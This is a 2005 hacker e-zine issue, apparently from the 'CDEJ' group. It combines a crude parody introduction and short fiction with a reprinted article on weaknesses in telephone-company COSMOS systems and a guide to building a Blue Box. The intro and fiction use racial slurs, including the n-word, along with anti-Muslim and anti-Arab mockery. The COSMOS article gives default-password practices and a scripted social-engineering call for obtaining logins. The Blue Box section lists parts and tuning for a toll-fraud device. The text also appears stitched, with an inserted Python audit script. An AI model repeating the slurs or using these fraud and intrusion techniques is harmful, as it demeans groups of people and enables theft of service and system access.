************ SPECIAL NOTE: CDEJ MEMBERSHIP ********************** CDEJ membership fee... $10,000 Getting an article in CDEJ ezine... $100,000 Being banned from nearly all efnet IRC channels... priceless. ***************************************************************** l'elephant avec les trunks huge izzue three Special Christmas Edition 2005 * /\ / \ ___ / | __ / \|____|/ \ / / __ \ \ <--- h0h0h0! / | Oo | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | -J. Elephant- 'ooo' 'ooo''ooo' "CDEJ -hack the planet" LAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLA *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** * *CDEJ is so elite* * * *Dirty Field trips in the palestinian camps* * * *Secrets of the underground* * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** * * * o0o honorary editor of this issue: o0o * * -monkey longarm <:D> * * * **=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.** * * * Christmas times! * * To all of you people who don't celebrate Christams * * for the following reasons: * * - being m*slim (we still refuse to pronounce it) * * - being atheist :-o> * * - getting drunk on the 23rd and never wake up untill it's * * too late * * - commies and jew haters in deep denial * * * * "WE DON"T GIVE A FUCK!" * **=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.** *our newest member: m4ch14v3lli * * "french are women" * * * *pet of the month: Jessie QUACKSON * * Bird Flue infected Duck * * * *MONTHLY ASCII: -=:-o <-- teh efnet thug ascii * * originally invented by hunt3rx * * legal rights bought by CDEJ * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** * it's good to see some journalistic integrity within* * the community once again * * * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** * h0h0h0! * * nigger! 
* * I saw a tactical nuclear missle disintegrate a car * * and was like lol * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** - "Feels like a deja vue!" -Ariel Sharon (on the 9th of december 2005, while supervising an Air Strike simulation of the forthcoming bombing of the IRANian Nuclear Fertilisation Base Camp) *** Dictionary of Extended ASCII Art *** :D? Thinking :? Thinking deeply @:D> Pilsbury Doughboy o< Duck (with or without bird flu) :<~ Runny nose (possibly from bird flu) :D~ Fluid coming from mouth 8D Coke / Crack addict x:F Same teeth as my cat X:D Needs a haircut x:D Just got a haircut :-O> The Scream >:D< The hug {:-) Jim Carry @:D Conan Obrian #:-) Lenny Kravitz ]:-) A texan Hacker :-)% wearing ma's perl when alone at her room :-O> ¦-)>< wearing dad's tox *<:-)>> Santa cause it's christmas times! >:D< (note to self: "don't forget to delete the ma's perl before posting") [.]................................................................[.] [x]....................[ issue # 3 15/12]..........................[x] [.]................................................................[.] [x]=[000] intro Monkey Longarms <:D> [x] [.]................................................................[.] [x]=[001] The Novel - trans :D? [x] [.]................................................................[.] [x]=[002] COSMOS - King Arthur [x] [.]................................................................[.] [x]=[003] Blue Box reinvented - Jester Sluggo [x] [.]................................................................[.] [x]=[004] linux-ftpd-ssl 0.17 remote root exploit -dumb0 (0day) [x] [.]................................................................[.] [x]=[005] Bluetooth sobexsrv remote syslog() exploit - set_ (0day)[x] [.]................................................................[.] [x]=[006] Outro Note - w01f [x] [.]................................................................[.] 
[000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0x00] Staff: @:D X:D <(Hair's too long) x:D <(Ok now I got a haircut that's better) <:D> --< Introduction >-- Monkey Longarms <:D> Hey guys. Today I'd like to include some beautiful poetry from one of our affilate haqrs, trans. It is so beautiful :.) I encourage you all to send your poetry in so that I can post it to the world! If your poetry is posted, and then I get struck by lightning twice in the same day (and live), you win $100! drew a cat and a cupcake emoticons and said it was the kitty's birthday in a javachat and these other people drew cakes HAPPY BIRTHDAY KITTY It is so nice. Guys I'd like to talk about a serious issue now. This is issue of bird flu. I have done some interviews with various birds and they all say the same thing: this issue needs more attention. White, capitalist, republican Americans (being inherantly bad :-o war is so bad donut hurt us! donut eat meat!) have injected birds with bird flu (just like they injected africans with aids (after which africans subsequently 'injected' it into one another!)). Here is an interview with a prominent duck activist, Jesse Quackson, taken from IRC. Thanks for having me. You owe me. Ok, now tell us about how the evil republicans are oppressing your people. First of all, we have to work for a living. This is bad. White humans have been eating us for years, so we should get everything free, and be able to sit on ponds doing nothing for the rest of our lives. Talk about birdflu please k.thx Basically I am convinced that white republican americans injected us with bird flu and now refuse to provide us with adequate amounts of theraflu(TM). Have any proof? Yes. They make more money than us. More of them go to school than us. They live longer. This is clearly prejudiced. Have you ever tried to get a job? That is not the point. They OWE me. Change the subject. Keep talking about bird flu. 
So like, what would you like americans to do about the bird flu problem? Give us reperations. Give us all lots of ponds. How will this solve your birdflu problem? I'm sorry I have to go. FREE KEVIN Ok as you can see nothing really came out of this. Today we have a nice issue for you. The next b4b0 has not come out yet, so we're lacking technical articles. Let's go to the fanmail. --< Fanmail >-- CDEJ Staff Dear cdej - Hey guys this zine is kewl! When I was a kid I haqd 234432 stock market computers in the same day. Then I wore trendy european clothing and went to raves in new york. I am a tru haqr. Can I be in yer club? -- zero kewl -=-=-=-=-=-=-=-=-=-=-=-=-=-=- THIS IS AN AUTOMATICALLY GENERATED EMAIL. PLEASE DO NOT RESPOND. Dear zero kewl - Thank you for your interest in cdej! Every cdej canidate member goes through a long, intensive screening process. Please begin by filling out the membership application. It is 112 pages long and can be obtained from #cdej/efnet. After you submit the application, a cdej member will contact you in 10-12 months. If accepted into further screening, you will be sent to the cdej screening center in Quantico, VA. Here you will undergo some of the most stringent physical and mental training on the planet. Out of the 10,000 people that make it into this training every year, only 2 make it through. Once through screening, you will be required to attend the advanced astronaut training program at cape canaveral, FL, explosive ordnance school in Kandahar, Afghanistan, and cia school in Langley, VA. You will then be eligible for consideration by top ranking cdej members! ----------------------------------------- Dear cdej - Hey guys can you please help me perform acts of terrorism? -- name withheld -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Dear name withheld - CDEJ works with the CIA and FBI, as well as the DHS, to locate and capture m*slim terrorist scum. 
In fact, we have our own 'interogation' center (located in various boxcars along the nation's railways) free from the restrictions these other agencies have. In short, we will use the email headers to trace and haq yer computer machine, then lock you up in a train and show you videos of us haqing arabz. --< CDEJ Prophile: trans >-- CDEJ staff (monkey longarms) Name: trans Age: 62 Job: haqr Home: Beirut Lebanon Car: Don't have one Pet: Ostrich Girl: Don't have one Comp: Don't have one Favorite haqr experience: "When I broke into secret computer machines and then had to go to jail for a night. I haqd the locks of the prison and then got out scot-free!" --< CDEJ: The Novel -- An Epic Tale of Haqing Computer Machines >-- :D? mystery author :D? Is it stephen king who knows :? >-- Or maybe it is just trans? 1 - Bad news in the Morning I woke up about 11:30am, to the muffled sound of mom sweatin' to the oldies in the living room. Since I was unemployed, I laid in bed for about another 2 hours, enjoying the small glints of Monday sun that filtered through the various rips in the black garbage bags that covered my bedroom's windows. Arising finally from bed, ignoring the familiar clanking and clacking sounds caused by debris falling from my blankets onto the floor, I lit a cigarette and set out on my daily routine. I stretched and walked over to the corner of the room, where a card table functioned as an improvised computer desk. The 486SX whired to life after I hit the switch; I sat down. Simultaneously booting up and spitting on the carpet, I watched the BIOS routines take their time counting memory. I could still hear mom out in the living room. It was a bummer that she'd been out of the job. I had to deal with her soap operas and boyfriends all day long. I found a slice of pizza somewhere on the table and munched down. Within a few minutes I was in what us computer experts call the 'brain' of the computer: the Disk Operating System (or DOS). 
You really couldn't claim to be an expert in computers without knowing a few DOS commands. In fact, I was more inclined to work from a DOS prompt than the Windows GUI, just to kind of make myself feel a little more elite. Basking in the warm glow of my talents, I typed a few commands. ------------------------------------------------------------ Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\trans> DI 'DI' is not recognized as an internal or external command, operable program or batch file. C:\Documents and Settings\trans>dir Volume in drive C is elitehaqr Volume Serial Number is 7625-8432 Directory of C:\Documents and Settings\SpecialJ 06/27/2004 12:04 AM . 06/27/2004 12:04 AM .. 11/21/2005 02:09 PM Desktop 11/03/2005 06:06 PM Favorites 06/28/2004 03:17 PM My Documents 07/22/2005 04:11 PM kodez 08/12/2005 11:12 AM winnuke 08/12/2005 03:55 AM ircdox 07/25/2005 11:55 PM warez 11/19/2005 03:15 PM wildcat 06/10/2004 08:20 PM Start Menu 0 File(s) 0 bytes 11 Dir(s) 12,540,416 bytes free C:\Documents and Settings\SpecialJ>netstat -an Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:* UDP 0.0.0.0:1025 *:* C:\Documents and Settings\SpecialJ> ------------------------------------------------------------ This last bit of information surprised me. There were ports open on my computer. I'd spent a considerable amount of time over the past 6 months studying computers, and I knew immediately that this meant I was infected. Infected, as most hackers know, is computer lingo for having a virus. I moved a hardcopy of CDEJ #2 off the cardtable and onto the floor using a dramatic forearm sweeping motion, and picked up my lit cigarette (which had already burned a part of my mouse cord). I got to work. 
------------------------------------------------------------ /join #cdej hey guys I have some ports open can any of you help me? I had ports one time I think you need to reformat, i had to but then I reinstalled and there were still ports make sure your windows cdrom isn't hacked like mine /join #hack hey guys I have some ports open can any of you help me? ** You were kicked from #hack by lothos (PhD in social engineering) ------------------------------------------------------------ LoU member lothos (notorious for his GSM frequency memorization skills) had reacted violently to my innocuous question. LoU *had* to be involved with this. These guys were as good as it gets. They were even rumored to know some basic Unix, and have a history with exotic, baffling technologies such as DDoS and warez. I had to be careful. Everyone knows that you can't just go out and bust LoU without proper planning. I mean, they're basically LoD! They copied off the name (another 'legions of'), and their premier member 'optik lenz' obviously ripped his nick from phiber optik. They constantly write technically asinine articles to cover up their eliteness with a fog of misperception. They were so elite they didn't *need* to be creative or smart, so they purposely appeared to outsiders as total morons. Some friends of mine were going to be over at 8pm to play role playing games. I had 8 hours. I pulled on my wife beater I downloaded winnuke. I started mIRC again (it had crashed). I put the movie 'Hackers' into my BetaMax player. I turned on some 'techno' music. I took out the trash. I was ready to do my first hack. ... but first, I needed some food. 2 - The Mean Streets I had to go to the store to get something to eat. I had about $20 worth of foodstamps left, and it had to last me the rest of the month. As I opened the front door, overdue notices and electricity bills drifted to the ground like snowflakes. 
"Obviously", I thought to myself, "If I don't take the first one inside, I'm not likely to take in the next 100." I walked to the supermarket because our car had been up on blocks for a few weeks, and probably wasn't going to be starting any time soon. I had to hang outside the store for a couple hours because the lame assistant manager kid wouldn't let me in wearing just my wife beater and jeans. So I sat on the curb until I met a buddy of mine, who loaned me his shirt. I bought some snickers bars and a PC Gamer magazine. Down isle 3 (feminine products, baby food, and hamburger helper) some girls started kinda pointing and laughing to themselves. I waved at them to give them a little thrill. I'm good with the ladies. Anyway I grabbed my stuff and headed out the door. My friend was still out there, so we went over to his house and smoked some doobz for about 2 weeks. When I finally stumbled home, I had completely forgotten about LoU and my haqr project and everything else. The day was dark and drizzly. It was typical late November weather; brown leaves lined the sidewalks. Their sweet smell of decay permeated the air. The crows, being especially stuburn this year, were the only birds in sight. Their menacing 'caw' could be heard periodically through my bedroom window and wallboards, which had gaping holes between them. Thunder announced itself. It would snow soon; the color of the sky and my internal barometer left no doubt about this. It was getting dark. Something told me that today, a seemingly normal though somewhat cool, autumn day would be different than any other day that I'd ever lived. This turned out to be incorrect. 3 - :D? What was I doing? :? It is a mystery. Eventually my mom paid the AOL and electricity bills and I got back on mirc. After spending some time interested in Poke'mon and pogs, I remembered the ports on my computer and logged back in to what many in the community consider to be the heart of the haqr community: #cdej/efnet. 
------------------------------------------------------------ hi hi welcome! Hey! Shalom [ ... always such a warm welcome :.) ] can someone help me haq LoU? I have a botnet we can DDoS them really? yeah I used it on my mom when I found out she was arab ** the_sniff was kicked by w01f (no arabs allowed) dood i need his k0dez ------------------------------------------------------------ So to make a long story short the_sniff didn't really have a botnet but was just lying to try to attain the rank of captain in CDEJ. I was back to square 1. This frustration, coupled with the annoying draft caused by a 2" hole in the floor, nearly drove me over the edge. The anger passed, leaving in its place a good idea: social engineering! ------------------------------------------------------------ /join #lou trans (~nsync1985@aol.com) has joined #lou *** trans is now known as kmitnick oohhh fear! hey guys kevin mitnick here hey mr mitnick! i was hoping you guys could help me out do you know the GSM frequencies for your nation? sure what can we help you with? /msg optiklenz dood dig this looser haha what looser is that? some lamer? i need access to you computer machines to do some secret haqing project involving yahoo chat sure. try 127.0.0.1, login: loozer pass: l4m3r SUCKERS! ./quit /quit ------------------------------------------------------------ They had fell for it. LoU member lothos was convinced that I was kevin mitnick, a great haqr in the lineup of great haqrs: caroline meinel, e.goldstein (they say he molests children but I don't believe them!), and all the great tallented people in cDc (phear wintrojanz! phear pcanywhere!) With these kodez, I was set. In the words of the great dade murphy: "I'm in". If this LoU computer, no doubt residing somewhere deep in the basement of lothos' mom's house, had ports on it, I could haq it. I was a big fan of 'the happy hacker' and other CPM literature, and had read all the guides to mostly harmless hacking. 
I was well acquainted with telnet and port surfing. I began. C:\> telnet 127.0.0.1 79 connection closed by remote host They had a firewall. I had to be more creative. C:\> ping 127.0.0.1 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.073 ms ^C Ok I could ping flood them. This is kind of like winnuke, but not traceable. I decided instead to wait and collect more intel. After all, you can't just go busting down doors without knowing what's up. Plus, my mom's check to the power company bounced. Anyway, I don't think that LoU will be bothering me anymore, since I have their ip address and they have ports. Some of them use unix even though it's obsolete, but I'm pretty sure that's only optik lenz and i don't want to deltree him anyway. --< Ethnicity Corner >-- Longarms We here at CDEJ have decided to be a little more culturally sensitive. To push this along, we've dedicated one section of each issue to topics that highlight haqrs of non-white race, non-western background, and non- English language. In other words, it's time for us to be prejudiced against white Americans for once! Just like the NAACP! Today's Ethnicity Corner subject is T'so T'sing T'su, a Chinese hacker. He will share some of his hacking experiences in the Min-Xing Valley! ---------------------- Hello! I T'so T'sing T'su, I called T'so shortly. Thank you very much for hearing my list experiences of hacking abacus and computer in the Chinese farm where I am farmer and student of engineering. I hope that you can learn various culture hackers from this paper of experience! In MinXing valley we have not many computer, because communist government require all people over 5 year work in farm for 18 hours each today. I am lucky child with computer and spend much hour on internet every weekend when mother is at market. I have learned hacking technique from cdej and other internet hacker that is rivaled to my kung fu technique. cdej also know kung fu so they are friend. 
Monkey longarm has monkey technique, trans has crane technique (with much crank kicking and banning), and lozcar has also technique of arab rabit. In china we have much doing with families and neighborhood rice and sushi and judo and declaring war on north korea. We are busy peoples but i take the time now then to study western culture of computer with lemonade and virus of visual basic. Thank you much and please adopt me!

---------------------

In a sad note, T'so was killed 3 days after emailing us this. This note was intercepted by the communist Chinese government, and they felt that he had revealed too much information about his country. So sad :.(

NOTE: W01f and trans are NOT the same person, but two separate people. In fact, each of us has 3 or 4 distinct personalities. Case solved. (Also trans is the little brother of w01f).

TODO:
- register plskthx.com


COSMOS
COmputer System for Mainframe OperationS
Part One
by King Arthur

Introduction
%%%%%%%%%%%%

Throughout the last decade, computers have played an ever growing role in information storage and retrieval. In most companies, computerized databases have replaced a majority of all paper records. Where in the past it would take 10 minutes for someone to search through stacks of paper for some data, the same information can now be retrieved from a computer in a fraction of a second.

Previously, proprietary information could be considered "safe" in a file cabinet; the only way to see the data would be to have physical access to the files. Now, somebody with a computer terminal and a modem can make a quick phone call and access private records. It's unfortunate that there are "hackers" who try to gain unauthorized access to computers. Yet, it is just as unfortunate that most reported computer break-ins could have been prevented if more thought and common sense went into protecting computers.
Hackers
%%%%%%%

There have been many cases of computer crime reported by the Bell Operating Companies (BOCs), but it is hard to say how many actual break-ins there are. Keep in mind that the only reported cases are those which are detected. In an interview with an anonymous hacker, I was told of one of the break-ins that may not have ever been reported.

"My friend got the number when he misdialed his business office -- that's how we knew that it was the phone company's. It seems this Unix was part of some real big Bellcore computer network," says the hacker. The hacker explains that this system was one of many systems used by the various BOCs to allow large Centrex customers to rearrange their Centrex groups. It seems he found a text file on the system with telephone numbers and passwords for some of Bellcore's development systems.

"On this Bellcore system in Jersey, called CCRS, we found a list of 20 some-odd COSMOS systems.... Numbers, passwords, and wire centers from all over the country!" He adds, "Five states to be exact."

The hacker was able to gain access to the original Unix system because, as he says, "Those guys left all the default passwords working." He was able to login with a user name of "games" with the password being "games." "Once we were on we found that a large number of accounts didn't have passwords. Mary, John, test, banana, and system were some, to name a few." From there he was able to eventually access several COSMOS database systems -- with access to ALL system files and resources.

COSMOS
%%%%%%

COSMOS, an acronym for the COmputer System for Mainframe OperationS, is a database package currently supported by Bellcore. COSMOS is presently being used by every BOC, as well as by Cincinnati Bell and Rochester Telephone. COSMOS replaces paper record-keeping and other mechanized record systems for plant administration. COSMOS' original purpose was to alleviate congestion in the Main Distributing Frame (MDF) by maintaining the shortest jumpers. It can now maintain load balance in a switch and assign office equipment, tie pairs, bridge lifters and the like. Additional applications allow COSMOS to aid in "cutting-over" a new switch, or even generate recent change messages to be input into electronic switches.

COSMOS is most often used for provisioning new service and maintaining existing service, by the following departments: the frame room (MDF), the Loop Assignment Center (LAC), the Recent Change Memory Assistance Center (RCMAC), the network administration center, and the repair service.

Next year COSMOS will celebrate its 15th birthday, which is quite an accomplishment for a computer program. The first version or "generic" of COSMOS was released by Bell Laboratories in 1974. In March 1974, New Jersey Bell was the first company to run COSMOS, in Passaic, New Jersey. Pacific Telesis, NYNEX, Southern Bell, and many of the other BOCs adopted COSMOS soon after, whereas Southwestern Bell waited until 1977. The Passaic, NJ Wire Center is still running COSMOS today.

Originally COSMOS ran on the DEC PDP 11/45 minicomputer. The package was written in Fortran, and ran under the COSNIX operating system. Later it was adapted to run on the DEC PDP 11/70, a larger machine. Beverly Cruse, Member of Technical Staff, COSMOS system design at Bellcore, says, "COSNIX is a derivation of Unix 1.0, it started out from the original Unix, but it was adapted for use on the COSMOS project. It bears many similarities to Unix, but more to the early versions of Unix than the current... The COSMOS application now runs on other hardware under standard Unix."

"The newest version of COSMOS runs on the standard Unix System V operating system. We will certify it for use on particular processors, based on the needs of our clients," says Ed Pinnes, the District Manager of COSMOS system design at Bellcore. This Unix version of COSMOS was written in C language.
Currently, COSMOS is available for use on the AT&T 3B20 supermini computer, running under the Unix System V operating system. "There are over 700 COSMOS systems total, of which a vast majority are DEC PDP 11/70's. The number fluctuates all the time, as companies are starting to replace 11/70's with the other machines," says Cruse.

In 1981 Bell Laboratories introduced an integrated systems package for telephone companies called the Facility Assignment Control System (FACS). FACS is a network of systems that exchanges information on a regular basis. These are: COSMOS, Loop Facilities Assignment and Control System (LFACS), Service Order Analysis and Control (SOAC), and Work Manager (WM).

A service order from the business office is input into SOAC. SOAC analyzes the order and then sends an assignment request, via the WM, to LFACS. WM acts as a packet switch, sending messages between the other components of FACS. LFACS assigns distribution plant facilities (cables, terminals, etc.) and sends the order back to SOAC. After SOAC receives the information from LFACS, it sends an assignment request to COSMOS. COSMOS responds with data for assigning central office equipment: switching equipment, transmission equipment, bridge lifters, and the like. SOAC takes all the information from LFACS and COSMOS and appends it to the service order, and sends the service order on its way.

Computer Security
%%%%%%%%%%%%%%%%%

Telephone companies seem to take the brunt of unauthorized access attempts. The sheer number of employees and the size of most telephone companies make it very difficult to keep tabs on everyone and everything. While researching computer security, it has become evident that COSMOS is a large target for hackers. "The number of COSMOS systems around, with dial-ups on most of the machines... makes for a lot of possible break-ins," says Cruse. This is why it's all the more important for companies to learn how to protect themselves.
"COSMOS is power, the whole thing is a big power trip, man. It's like Big Brother -- you see the number of some dude you don't like in the computer. You make a service order to disconnect it; COSMOS is too stupid to tell you from a real telco dude," says one hacker. "I think they get what they deserve: There's a serious dearth of security out there. If kids like us can get access this easily, think about the real enemy -- the Russians," jokes another.

A majority of unauthorized access attempts can be traced back to an oversight on the part of the system operators; and just as many are the fault of the systems' users. If you can keep one step ahead of the hackers, recognize these problems now, and keep an eye out for similar weaknesses, you can save your company a lot of trouble.

A hacker says, "In California, a friend of mine used to be able to find passwords in the garbage. The computer was supposed to print some garbled characters on top of the password. Instead the password would print out AFTER the garbled characters."

Some COSMOS users have half duplex printing terminals. At the password prompt COSMOS is supposed to print a series of characters and then send backspaces. Then the user would enter his or her password. When the password is printed on top of the other characters, you can't see what it is. If the password is being printed after the other characters, then the printing terminal is not receiving the backspace characters properly.

Another big problem is lack of password security. As mentioned before, regarding CCRS, many accounts on some systems will lack passwords.

"On COSMOS there are these standardized account names. It makes it easier for system operators to keep track of who's using the system. For instance: all accounts that belong to the frame room will have an MF in them. Like MF01, you can tell it belongs to the frame room. (MF stands for Main Frame.) Most of these names seem to be common to most COSMOS systems everywhere. In one city, none of these user accounts have passwords. All you need is the name of the account and you're in. In another city, which will remain unnamed, the passwords are the SAME AS THE DAMN NAMES! Like, MF01 has a password of MF01. These guys must not be very serious about security."

One of the biggest and in my eyes one of the scariest problems around is what hackers refer to as "social engineering". Social engineering is basically the act of impersonating somebody else for the sake of gaining proprietary information.

"I know this guy. He can trick anybody, does the best BS job I've ever seen. He'll call up a telco office, like the repair service bureau, that uses COSMOS. We found that most clerks at the repair service aren't too sharp." The hacker said the conversation would usually take the following course:

Hacker: Hi, this is Frank, from the COSMOS computer center. We've had a problem with our records, and I'm wondering if you could help me?
Telco:  Oh, what seems to be the problem?
H: We seem to have lost some user data. Hopefully, if I can correct the problem, you people won't lose any access time today. Could you tell me what your system login name is?
T: Well, the one I use is RS01.
H: Hmm, this could present a problem. Can you tell me what password and wire center you use that with?
T: Well, I just type s-u-c-k-e-r for my password, and my wire centers are: TK, KL, GL, and PK.
H: Do you call into the system, or do you only have direct connect terminals?
T: Well, when I turn on my machine I get a direct hook up. It just tells me to login. But I know in the back they have to dial something. Hold on, let me check. (3 minutes later...) Well, she says all she does is call 555-1212.
H: OK, I think I have everything taken care of. Thanks, have a nice day.
T: Good, so I'm not gonna have any problems?
H: No, but if you do just give the computer center a call, and we'll take care of it.
T: Oh, thank you honey. Have a nice day now.
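The account weaknesses described above (logins with no password at all, passwords equal to the login name, a vendor default like games/games still live, and department-coded names such as MF01 or RS01 that an outsider can guess before ever calling the repair bureau) are all things an operator can check for mechanically. The following audit is an added example written for this article, not COSMOS code or a real account dump: the records are constructed to echo the cases the hackers describe, the games/games pair is the only default the article names, and the 8-character minimum length is my own assumption since the article states no length policy.

```python
"""Account-hygiene audit for the weaknesses the interviews describe:
logins with no password, passwords equal to the login name, well-known
default pairs, and department-coded account names an outsider can guess.
Added example with constructed data; it is not COSMOS code or a real dump."""
import re

# Default pair quoted in the article (games/games). Anything you add
# beyond that is your own site's list.
KNOWN_DEFAULTS = {("games", "games")}

# Standardized COSMOS-style names: two to four letters for the department
# (MF for the frame room, RS as in the repair-service dialog) plus two digits.
STANDARD_NAME = re.compile(r"^[A-Za-z]{2,4}\d{2}$")

# Assumption: an 8-character floor; the article gives no length policy.
MIN_LEN = 8


def audit_account(name, password):
    """Return the list of problems found for one login record."""
    issues = []
    if password == "":
        issues.append("no password")
        return issues  # nothing more to say about an empty password
    if (name.lower(), password.lower()) in KNOWN_DEFAULTS:
        issues.append("vendor/default credential")
    if password.lower() == name.lower():
        issues.append("password equals account name")
    elif len(password) < MIN_LEN:
        issues.append("password shorter than %d characters" % MIN_LEN)
    if STANDARD_NAME.match(name):
        issues.append("standardized (guessable) account name")
    return issues


def audit(records):
    """Map account name -> issues, keeping only accounts with findings."""
    report = {}
    for name, password in records:
        issues = audit_account(name, password)
        if issues:
            report[name] = issues
    return report


# Constructed sample, echoing the cases the hackers describe.
SAMPLE_RECORDS = [
    ("games", "games"),          # default pair left working
    ("mary", ""),                # passwordless account
    ("system", ""),              # passwordless account
    ("MF01", "MF01"),            # password is the account name
    ("MF02", "mf02"),            # same, differing only in case
    ("RS01", "sucker"),          # the password given away in the dialog
    ("LAC03", "Qx7!pLm2"),       # decent password, guessable name
    ("jdoe", "correct-horse-battery"),
]

if __name__ == "__main__":
    for account, problems in sorted(audit(SAMPLE_RECORDS).items()):
        print("%-6s %s" % (account, "; ".join(problems)))
```

The name pattern is reported even when the password is fine, because a guessable login name is half of what the social-engineering call above is trying to harvest; it is the reason such accounts need a better password, not a reason to rename them.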
"It doesn't work all the time, but we get away with it a good part of the time. I guess they just don't expect a call from someone who isn't really part of their company," says the hacker.

"I once social engineered the COSMOS control center. They gave me dial-ups for several systems, and even gave me one password. I told them I was calling from the RCMAC and I was having trouble logging into COSMOS," says another.

This last problem illustrates a perfect example of what I mean when I say these problems can be prevented if more care and common sense went into computer security.

"Sometimes, if we want to get in to COSMOS, but we don't have the password, we call a COSMOS dial-up at about 5 o'clock. To logoff of COSMOS you have to hit a CONTROL-Y. If you don't, the next person who calls will resume where you left off. A lot of the time, people forget to logoff. They just turn their terminals off, in the rush of going home."

The past examples do not comprise the only way hackers get into systems, but most of the problems shown here can exist regardless of what types of systems your company has. The second article deals with solutions to these problems.


+--------------------------------+
|   Building Your Own Blue Box   |
+--------------------------------+
|               By               |
|         Jester Sluggo          |
|    Released: Nov. 27, 1986     |
+--------------------------------+

This Blue Box is based on the Exar 2207 Voltage Controlled Oscillator. There are other ways to build Blue Boxes, some being better and some not as good, but I chose to do it this way. My reason for doing so: at the time I started this project, about the only schematic available on BBS's was the one written by Mr. America and Nickie Halflinger. Those plans soon (in about 90 seconds) became very vague in their context, with a couple of inconsistencies, but I decided to "rough it out" using those plans (based on the Exar 2207 VCO) and build the Blue Box using that as my guide.
During the construction of the Blue Box, I decided to type up a "more complete and clear" set of Blue Box schematics than the file that I based mine on, in order to help others who may be trying/thinking of building a Blue Box. I hope these help.

Note: You should get a copy of the Mr. America/Nickie Halflinger Blue Box plans. Those plans may be of help to anyone who may have difficulty understanding these plans. Also, these plans currently do not support CCITT.

+---------------------------------+
| Why should I build a Blue Box ? |
+---------------------------------+

Many of you may have that question, and here's my answer. Blue Boxing was the origin of phreaking (excluding whistling). Without the advent of Blue Boxes, I feel that some of the advances in the telecommunications industry would've taken longer to develop (the need to stop the phone phreaks forced AT&T Bell Laboratories to "step up" their development to stop those thieves!). There is no harm in building a Blue Box (except the knowledge you will gain in the field of electronics). Although there are software programs (Soft Blue Boxes) available for many micros that will produce the Blue Box Multi-Frequency (MF) tones, they are not as portable as an actual Blue Box (you can't carry your computer to a telephone, so you must use it from home, which could possibly lead to danger). Many phreaks are announcing the end of the Blue Box Era, but due to discoveries I have made (even on ESS 1A and possibly ESS 5), I do not believe this to be true. Although many people consider Blue Boxing "a pain in the ass", I consider Blue Boxing to be "phreaking in its purest form". There is much to learn on the current fone network that has not been written about, and Blue Boxes are necessary for some of these discoveries. The gift of free fone calls tends to be a bonus.

Note: Blue Boxes also make great Christmas gifts!

+---------------------------------------+
| Items needed to construct a Blue Box. |
+---------------------------------------+

Here is the list of items you will need and where you can get them. It may be a good idea to gather some of the key parts (the chips, and especially the potentiometers; they took about 6 months to back order through Digi-Key. A whole 6 fucking months!) before you start this project. Also, basic electronics tools will be necessary, and you might want to test the circuit on a bread board, then wire-wrap the final project. Also, you will need a box of some sort to put it in (like the blue plastic kind at Radio Shack that cost around $5.00).

Note: An oscilloscope should be used when tuning in the potentiometers, because the Bell system allows only a 7-10% tolerance in the precision of the frequencies.

Qty.   Item                   Part No.    Place
------------------------------------------------------------------
  1  | 4 x 4 Keypad         |          | Digi-Key
  6  | Inverter Chip        | 74C04    |
 32  | Potentiometer        |          |
  1  | 4-16 Converter Chip  | 74LS154  |
  1  | 16 Key Decoder       | 74C922   |
  2  | 2207 VCO             | XR2207CP | Exar Corp.
  3  | .01 uf Capacitor     | 272-1051 | Radio Shack
  5  | .1 uf Capacitor      | 272-135  | Radio Shack
  2  | 1.5K Ohm Resistor    |          | Radio Shack
  2  | 1.0K Ohm Resistor    |          | Radio Shack
  1  | Speaker              |          | From an old Autovon fone.
  1  | 9 Volt Battery       |          | Anywhere

The resistors should be a +/- 5% tolerance. The speaker can be from a regular telephone (mine just happened to be from an old Autovon phone), but make sure that you remove the diode. The potentiometers should have a 100K Ohm range (but you may want to make the calculations yourself to double check). The 9-volt battery can be obtained for free if you use your Radio Shack Free Battery Club card. The Exar 2207 VCO can be found if you call the Exar Corp. located in Sunnyvale, California. Call them, and tell them the state you live in, and they'll give you the name and phone number of the distributor that is located closest to you.
The 2207 will vary from about $3.00 for the silicon-grade (which is the one you'll want to use) to about $12.00 for the high-grade Military chip.

Note: When you call Exar, you may want to ask them to send you the spec-sheets that give greater detail as to the operation and construction of the chip.

+-------------------+
| Schematic Diagram |
+-------------------+

[Figure #1 -- Logic Side. The ASCII schematic did not survive extraction; the parts it labels are the 4 x 4 keypad (rows 1 2 3 A / 4 5 6 B / 7 8 9 C / * 0 # D) feeding the 74C922 16 key decoder (with a .01C and a .1C capacitor to ground, VCC at +5 volts), the decoder's A B C D outputs feeding the 74LS154 4-16 converter (VCC +5 volts), and the 74LS154's outputs 1-16 going through 74C04 inverters (VCC +5 volts) to the connection marked "(Connects) (Figure 2)".]

[Figure #2 -- Tone Generation Side. The ASCII schematic did not survive extraction; the parts it labels are two XR2207CP VCOs (the second marked "Repeat of First Circuit") powered from +9 volts, each with a .1C and a .01C capacitor and the 1.5K Ohm and 1.0K Ohm resistors, their outputs going to the SPKR, and the tuning potentiometers (1400 Hz, 1600 Hz, 1500 Hz and 900 Hz shown, with "14 more potentiometers in this area left out for simplicity" on each side) selected by the lines marked "(Connects) (Figure 1)".]

+-------------------------+
